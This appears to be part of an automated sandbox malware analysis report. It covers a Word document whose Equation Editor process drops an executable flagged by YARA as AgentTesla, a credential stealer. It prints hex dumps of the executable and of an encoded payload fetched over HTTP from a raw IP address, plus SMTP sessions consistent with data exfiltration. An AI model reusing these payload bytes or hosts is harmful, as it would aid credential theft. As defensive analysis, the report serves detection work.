                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 a3 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b6 03 00 00 0c 00 00 00 00 00 00 1e d4 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 ac d0 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 d3 03 00 57 00 00 00 00 e0 03 00 e8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 03 00 00 20 00 00 00 b6 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 08 00 00 00 e0 03 00 00 0a 00 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 03 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 2e 00 00 d0 a4 03 00 0b 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a ba 72 5c 91 00 70 28 4e 03 00 0a 80 01 00 00 04 73 8a 00 00 0a 80 02 00 00 04 72 60 91 00 70 80 03 00 00 04 73 4f 03 00 0a 80 04 00 00 04 2a a6 72 d3 93 00 70 19 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8b 93 00 70 a2 25 18 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8f 93 00 70 a2 25 18 72 8b 93 00 70 a2 25 19 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72 3d 66 00 70 a2 25 17 72 a3 93 00 70 a2 25 18 72 3d 66 00 70 a2 25 19 72 09 67 00 70 a2 28 3c 02 00 0a 2a 7e 7e 05 00 00 04 3a 0f 00 00 00 28 30 00 00 06 73 67 03 00 0a 80 05 00 00 04 7e 05 00 00 04 2a 1a 20 00 00 00 00 2a 32 72 78 96 00 70 14 28 29 00 00 06 2a 32 72 ae 96 00 70 14 28 29 00
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL ` @ `W H.text$ `.rsrc@@.reloc@BH.P *r\p(Nsr`psO*rp%rp%rp%rp(<*rp%rp%rp%rp%rp(<*rp%r=fp%rp%r=fp%rgp(<*~~:(0sg~* *2rxp()*2rp()


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.2249168193.239.147.10380C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 27, 2021 19:29:37.731040955 CET262OUTGET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1
                                                                            Host: 193.239.147.103
                                                                            Connection: Keep-Alive
                                                                            Jan 27, 2021 19:29:37.780169010 CET263INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 27 Jan 2021 18:29:37 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 912812
                                                                            Last-Modified: Tue, 26 Jan 2021 23:17:49 GMT
                                                                            Connection: keep-alive
                                                                            Vary: Accept-Encoding
                                                                            ETag: "6010a31d-dedac"
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Accept-Ranges: bytes
                                                                            Data Raw: 3c 70 3e 4b 4b 48 59 47 48 6f 6d 6d 48 47 48 65 48 47 48 47 48 47 48 6d 48 47 48 47 48 47 48 77 55 55 48 77 55 55 48 47 48 47 48 6f 72 6d 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 42 6d 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 6f 77 72 48 47 48 47 48 47 48 6f 6d 48 65 6f 48 6f 72 42 48 6f 6d 48 47 48 6f 72 47 48 59 48 77 47 55 48 65 65 48 6f 72 6d 48 6f 48 4b 42 48 77 47 55 48 65 65 48 72 6d 48 6f 47 6d 48 6f 47 55 48 6f 6f 55 48 65 77 48 6f 6f 77 48 6f 6f 6d 48 6f 6f 6f 48 6f 47 65 48 6f 6f 6d 48 59 4b 48 6f 47 59 48 65 77 48 59 59 48 59 4b 48 6f 6f 47 48 6f 6f 47 48 6f 6f 6f 48 6f 6f 42 48 65 77 48 59 72 48 6f 47 6f 48 65 77 48 6f 6f 6d 48 6f 6f 4b 48 6f 6f 47 48 65 77 48 6f 47 55 48 6f 6f 47 48 65 77 48 42 72 48 4b 59 48 72 65 48 65 77 48 6f 47 59 48 6f 6f 6f 48 6f 47 47 48 6f 47 6f 48 6d 42 48 6f 65 48 6f 65 48 6f 47 48 65 42 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 72 47 48 42 59 48 47 48 47 48 4b 42 48 6f 48 65 48 47 48 77 42 48 6f 42 65 48 6f 42 48 59 42 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 77 77 6d 48 47 48 65 6d 48 47 48 6f 6f 48 6f 48 72 47 48 47 48 47 48 77 55 6d 48 65 48 47 48 47 48 42 48 47 48 47 48 47 48 47 48 47 48 47 48 42 77 48 77 59 48 6d 48 47 48 47 48 65 77 48 47 48 47 48 47 48 65 77 48 6d 48 47 48 47 48 47 48 47 48 6f 42 48 47 48 65 77 48 47 48 47 48 47 48 77 48 47 48 47 48 6d 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 42 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 59 42 48 6d 48 47 48 47 48 77 48 47 48 47 48 47 48 47 48 47 48 47 48 77 48 47 48 59 42 48 6f 65 65 48 47 48 47 48 6f 42 48 47 48 47 48 6f 42 48 47 48 47 48 47 48 47 48 6f 42 48 47 48 47 48 6f 42 48 47 48 47 48 47 48 47 48 47 48 47 48 6f 42 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 77 65 42 48 77 72 48 6d 48 47 48 4b 59 48 47 48 47 48 47 48 47 48 65 77 48 6d 48 47 48 72 72 48 65 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 42 6d 48 6d 48 47 48 6f 77 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 65 77 48 47 48 47 48 72 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 72 48 65 77 48 47 48 47 48 4b 77 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 6d 42 48 6f 6f 42 48 6f 47 6f 48 6f 77 47 48 6f 6f 42 48 47 48 47 48 47 48 42 72 48 77 55 65 48 65 48 47 48 47 48 65 77 48 47 48 47 48 47 48 77 55 6d 48 65 48 47 48 47 48 77 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 65 77 48 47 48 47 48 59 42 48 6d 42 48 6f 6f 6d 48 6f 6f 55 48 6f 6f 6d 48 59 59 48 47 48 47 48 47 48 72 72 48 65 48 47 48 47 48 47 48 65 77 48 6d 48 47 48 47 48 6d 48 47 48 47 48 47 48 47 48 6d
                                                                            Data Ascii: <p>KKHYGHommHGHeHGHGHGHmHGHGHGHwUUHwUUHGHGHormHGHGHGHGHGHGHGHBmHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHowrHGHGHGHomHeoHorBHomHGHorGHYHwGUHeeHormHoHKBHwGUHeeHrmHoGmHoGUHooUHewHoowHoomHoooHoGeHoomHYKHoGYHewHYYHYKHooGHooGHoooHooBHewHYrHoGoHewHoomHooKHooGHewHoGUHooGHewHBrHKYHreHewHoGYHoooHoGGHoGoHmBHoeHoeHoGHeBHGHGHGHGHGHGHGHrGHBYHGHGHKBHoHeHGHwBHoBeHoBHYBHGHGHGHGHGHGHGHGHwwmHGHemHGHooHoHrGHGHGHwUmHeHGHGHBHGHGHGHGHGHGHBwHwYHmHGHGHewHGHGHGHewHmHGHGHGHGHoBHGHewHGHGHGHwHGHGHmHGHGHGHGHGHGHGHBHGHGHGHGHGHGHGHGHYBHmHGHGHwHGHGHGHGHGHGHwHGHYBHoeeHGHGHoBHGHGHoBHGHGHGHGHoBHGHGHoBHGHGHGHGHGHGHoBHGHGHGHGHGHGHGHGHGHGHGHweBHwrHmHGHKYHGHGHGHGHewHmHGHrrHeHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHBmHmHGHowHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHewHGHGHrHGHGHGHGHGHGHGHGHGHGHGHrHewHGHGHKwHGHGHGHGHGHGHGHGHGHGHGHmBHooBHoGoHowGHooBHGHGHGHBrHwUeHeHGHGHewHGHGHGHwUmHeHGHGHwHGHGHGHGHGHGHGHGHGHGHGHGHGHGHewHGHGHYBHmBHoomHooUHoomHYYHGHGHGHrrHeHGHGHGHewHmHGHGHmHGHGHGHGHm


                                                                            SMTP Packets

                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                            Jan 27, 2021 19:30:18.838618040 CET58749169198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                            Jan 27, 2021 19:30:18.839448929 CET49169587192.168.2.22198.54.122.60EHLO 724536
                                                                            Jan 27, 2021 19:30:19.032927036 CET58749169198.54.122.60192.168.2.22250-MTA-09.privateemail.com
                                                                            250-PIPELINING
                                                                            250-SIZE 81788928
                                                                            250-ETRN
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-ENHANCEDSTATUSCODES
                                                                            250-8BITMIME
                                                                            250 STARTTLS
                                                                            Jan 27, 2021 19:30:19.033739090 CET49169587192.168.2.22198.54.122.60STARTTLS
                                                                            Jan 27, 2021 19:30:19.228844881 CET58749169198.54.122.60192.168.2.22220 Ready to start TLS
                                                                            Jan 27, 2021 19:30:25.400098085 CET58749170198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                            Jan 27, 2021 19:30:25.400990009 CET49170587192.168.2.22198.54.122.60EHLO 724536
                                                                            Jan 27, 2021 19:30:25.594579935 CET58749170198.54.122.60192.168.2.22250-MTA-09.privateemail.com
                                                                            250-PIPELINING
                                                                            250-SIZE 81788928
                                                                            250-ETRN
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-ENHANCEDSTATUSCODES
                                                                            250-8BITMIME
                                                                            250 STARTTLS
                                                                            Jan 27, 2021 19:30:25.595061064 CET49170587192.168.2.22198.54.122.60STARTTLS
                                                                            Jan 27, 2021 19:30:25.788259029 CET58749170198.54.122.60192.168.2.22220 Ready to start TLS
                                                                            Jan 27, 2021 19:30:33.386825085 CET58749172198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                            Jan 27, 2021 19:30:33.387015104 CET49172587192.168.2.22198.54.122.60EHLO 724536
                                                                            Jan 27, 2021 19:30:33.582669973 CET58749172198.54.122.60192.168.2.22250-MTA-09.privateemail.com
                                                                            250-PIPELINING
                                                                            250-SIZE 81788928
                                                                            250-ETRN
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-ENHANCEDSTATUSCODES
                                                                            250-8BITMIME
                                                                            250 STARTTLS
                                                                            Jan 27, 2021 19:30:33.583038092 CET49172587192.168.2.22198.54.122.60STARTTLS
                                                                            Jan 27, 2021 19:30:33.778525114 CET58749172198.54.122.60192.168.2.22220 Ready to start TLS
                                                                            Jan 27, 2021 19:30:42.642733097 CET58749173198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                            Jan 27, 2021 19:30:42.643021107 CET49173587192.168.2.22198.54.122.60EHLO 724536
                                                                            Jan 27, 2021 19:30:42.847354889 CET58749173198.54.122.60192.168.2.22250-MTA-09.privateemail.com
                                                                            250-PIPELINING
                                                                            250-SIZE 81788928
                                                                            250-ETRN
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-ENHANCEDSTATUSCODES
                                                                            250-8BITMIME
                                                                            250 STARTTLS
                                                                            Jan 27, 2021 19:30:42.847765923 CET49173587192.168.2.22198.54.122.60STARTTLS
                                                                            Jan 27, 2021 19:30:43.051781893 CET58749173198.54.122.60192.168.2.22220 Ready to start TLS
                                                                            Jan 27, 2021 19:30:52.774681091 CET58749174198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                            Jan 27, 2021 19:30:52.775216103 CET49174587192.168.2.22198.54.122.60EHLO 724536
                                                                            Jan 27, 2021 19:30:52.979588985 CET58749174198.54.122.60192.168.2.22250-MTA-09.privateemail.com
                                                                            250-PIPELINING
                                                                            250-SIZE 81788928
                                                                            250-ETRN
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-ENHANCEDSTATUSCODES
                                                                            250-8BITMIME
                                                                            250 STARTTLS
                                                                            Jan 27, 2021 19:30:52.980285883 CET49174587192.168.2.22198.54.122.60STARTTLS
                                                                            Jan 27, 2021 19:30:53.184436083 CET58749174198.54.122.60192.168.2.22220 Ready to start TLS
                                                                            Jan 27, 2021 19:30:59.243333101 CET58749175198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                            Jan 27, 2021 19:30:59.243845940 CET49175587192.168.2.22198.54.122.60EHLO 724536
                                                                            Jan 27, 2021 19:30:59.437447071 CET58749175198.54.122.60192.168.2.22250-MTA-09.privateemail.com
                                                                            250-PIPELINING
                                                                            250-SIZE 81788928
                                                                            250-ETRN
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-ENHANCEDSTATUSCODES
                                                                            250-8BITMIME
                                                                            250 STARTTLS
                                                                            Jan 27, 2021 19:30:59.438045025 CET49175587192.168.2.22198.54.122.60STARTTLS
                                                                            Jan 27, 2021 19:30:59.631119013 CET58749175198.54.122.60192.168.2.22220 Ready to start TLS

                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            Analysis Process: WINWORD.EXE PID: 1464 Parent PID: 584

                                                                            General

                                                                            Start time:19:29:37
                                                                            Start date:27/01/2021
                                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            Wow64 process (32bit):false
                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                            Imagebase:0x13f540000
                                                                            File size:1424032 bytes
                                                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Analysis Process: EQNEDT32.EXE PID: 2492 Parent PID: 584

                                                                            General

                                                                            Start time:19:29:38
                                                                            Start date:27/01/2021
                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                            Imagebase:0x400000
                                                                            File size:543304 bytes
                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Analysis Process: poiuytrewsdfghjklmnbvcx.exe PID: 2572 Parent PID: 2492

                                                                            General

                                                                            Start time:19:29:39
                                                                            Start date:27/01/2021
                                                                            Path:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Imagebase:0x11e0000
                                                                            File size:246784 bytes
                                                                            MD5 hash:D0154FB70ABD786136AE9F68F285541C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Analysis Process: poiuytrewsdfghjklmnbvcx.exe PID: 2332 Parent PID: 2572

                                                                            General

                                                                            Start time:19:29:47
                                                                            Start date:27/01/2021
                                                                            Path:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Imagebase:0x11e0000
                                                                            File size:246784 bytes
                                                                            MD5 hash:D0154FB70ABD786136AE9F68F285541C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low

                                                                            Analysis Process: poiuytrewsdfghjklmnbvcx.exe PID: 2712 Parent PID: 2572

                                                                            General

                                                                            Start time:19:29:47
                                                                            Start date:27/01/2021
                                                                            Path:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Imagebase:0x11e0000
                                                                            File size:246784 bytes
                                                                            MD5 hash:D0154FB70ABD786136AE9F68F285541C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >